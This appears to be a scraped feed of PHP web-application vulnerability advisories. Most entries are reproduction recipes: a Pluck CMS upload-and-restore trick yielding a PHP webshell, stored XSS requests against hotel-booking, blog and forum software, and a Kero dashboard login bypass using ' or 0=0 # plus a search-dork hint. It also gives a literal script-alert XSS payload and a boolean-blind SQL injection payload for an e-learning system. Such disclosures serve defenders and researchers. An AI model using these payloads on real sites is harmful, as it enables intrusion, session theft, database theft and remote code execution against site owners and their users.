File Upload vulnerability in PluckCMS v.4.7.10 allows a remote attacker to execute arbitrary code via the trashcan_restoreitem.php file.

Pluck-4.7.10 admin background exists a remote command execution vulnerability

it happens when restore file from trashcan,and the restoring file has the same with one of the files in uploaded files dir  
the coding flaw is in file /pluck/data/inc/trashcan\_restoreitem.php at line 54  
  
when $var1 is 'shell.php.txt', here $filename will get value 'shell' and $extension will get value 'php', and then concat with the string '\_copy' we will get the final filename with 'shell\_copy.php'

Proof  
step1: login -> pages -> manage files  
upload file with name shell.php.txt  
  
  
upload success  

step2: delete file to trashcan  

step3: upload the same file again  

step4: restore the file from trashcan, and the restored file is renamed as shell\_copy.php  
  

step5: visit webshell  

note: operate with "manage images" can do the same as it has the same coding flaw at line 76

CVE-2020-20969: Pluck-4.7.10 admin background exists a remote command execution vulnerability  · Issue #86 · pluck-cms/pluck

NetArt Media PHP Hotel Site version 2.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/php-hotel-booking                              ││  Vendor   : NetArt Media                                                               ││  Software : PHP Hotel Site 2.0                                                         ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /booking/index.php HTTP/2page=book&id=0&room_code=F753N132&room_name=Standard+double+room&price=&start_time=1687237200&end_time=1687410000&nights=&ProceedBooking=1&name=[XSS Payload]&email=abc%40abc.com&phone=[XSS Payload]&code=28649&remarks=[XSS Payload]-----------------------------------------------POST parameter 'name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'remarks' is vulnerable to XSS## Steps to Reproduce:1. At the index page Search for your Booking (as Guest)2. Select any Room by Press [Book Now]3. Inject your [XSS Payload] in "Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Remarks "6. Press [Book Now] to Submit You will receive to (Thank you. You'll receive an email when your booking is confirmed.)6. When the Admin Login to the Administration Panel on this Path (https://website/booking/admin/index.php)7. XSS will Fire & Executed on his Browser Instantly After the Login[-] Done

NetArt Media PHP Hotel Site 2.0 Cross Site Scripting

WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

WordPress Kero jQuery/HTML Dashboard PRO theme version 2.3.86 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WordPress - Kero jQuery/HTML Dashboard PRO Auth BY pass Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://dashboardpack.com/theme-details/kero-jquery-html-dashboard-pro/                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /panel/sign-in.php[+] User & Pass :  ' or 0=0 #[+] https://127.0.0.1/spdmuniversal.in/panel/sign-in.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Kero jQuery/HTML Dashboard PRO 2.3.86 SQL Injection

NetArt Media Blog LITE version 2.1 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/blog-lite                                      ││  Vendor   : NetArt Media                                                               ││  Software : Blog LITE 2.1                                                              ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS---------------------------------------------------------POST /blog/index.php HTTP/2-----------------------------401019026540470155022776857270Content-Disposition: form-data; name="title"[XSS Payload]-----------------------------401019026540470155022776857270Content-Disposition: form-data; name="content"-----------------------------401019026540470155022776857270Content-Disposition: form-data; name="author"[XSS Payload]-----------------------------401019026540470155022776857270Content-Disposition: form-data; name="email"-----------------------------401019026540470155022776857270## Steps to Reproduce:1. Visit Any Category on the Blog2. Write a comment (as Guest)3. Inject your [XSS Payload] in "Comment Title"4. Inject your [XSS Payload] in "Your Name"5. Submit6. By default the Blog Disable your comment for Admin Check7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts)8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2)9. XSS Will Fire and Executed on his Browser[-] Done

NetArt Media Blog LITE 2.1 Cross Site Scripting

Student Study Center Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)# Date of found: 12/05/2023# Exploit Author: VIVEK CHOUDHARY @sudovivek# Version: V1.0# Tested on: Windows 10# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/# CVE: CVE-2023-33580# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580Vulnerability Description -    The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.Steps to Reproduce -    The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:            1.  Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.        2.  Click on the "Admin" button to navigate to the admin login page.        3.  Login to the Admin account using the default credentials.                - Username: admin                - Password: Test@123        4.  Proceed to the Admin Profile page.        5.  Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.        6.  Click on the "Submit" button.        7.  Refresh the page, and the injected payload will be executed.As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

Student Study Center Management System 1.0 Cross Site Scripting

A vulnerability was found in PuneethReddyHC Online Shopping System Advanced 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/reg.php of the component Admin Registration. The manipulation leads to improper authentication. The attack can be launched remotely. The identifier VDB-232009 was assigned to this vulnerability.

CVE-2023-3337

The WP Sticky Social  plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing nonce validation in the ~/admin/views/admin.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

CVE-2023-3320: WP Sticky Social <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting — Wordfence Intelligence

BBoard Forum version 1.0 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/20246/                                      ││  Vendor   : WEBTM Dev                                                                  ││  Software : BBoard Forum 1.0                                                           ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS---------------------------------------------------------POST /viewforum.php?add_topic&f=24 HTTP/2articlename=lulz&question=&answer1=&answer2=&answer3=&answer4=&answer5=&answer6=&file=&editor=[XSS Payload]&btn-login=---------------------------------------------------------## Steps to Reproduce:1. Login in Any Normal User Mode2. Create a new Topic - Click on [+Post New]3. Put Any Title for the Topic4. Put your [XSS Payload] in Comment Editor and Click [Edit]5. XSS Fired6. Anyone will visit your Topic the [XSS Payload] Will Execute on his Browser[-] Done

BBoard Forum 1.0 Cross Site Scripting

elearning-SES version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: elearning-SES (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 06.14.2023## Vendor: https://github.com/oretnom23## Software: https://github.com/oretnom23/php-elearning-system## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payloads 73152795' or 7515=7515-- and 13684562' or3996=3998-- were each submitted in the username parameter. These tworequests resulted in different responses, indicating that the input isbeing incorporated into a SQL query in an unsafe way. The attacker caneasily steal all information from the database of this system.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)## Proof and Exploit:[href]()## Time spend:01:15:00

Tag

#php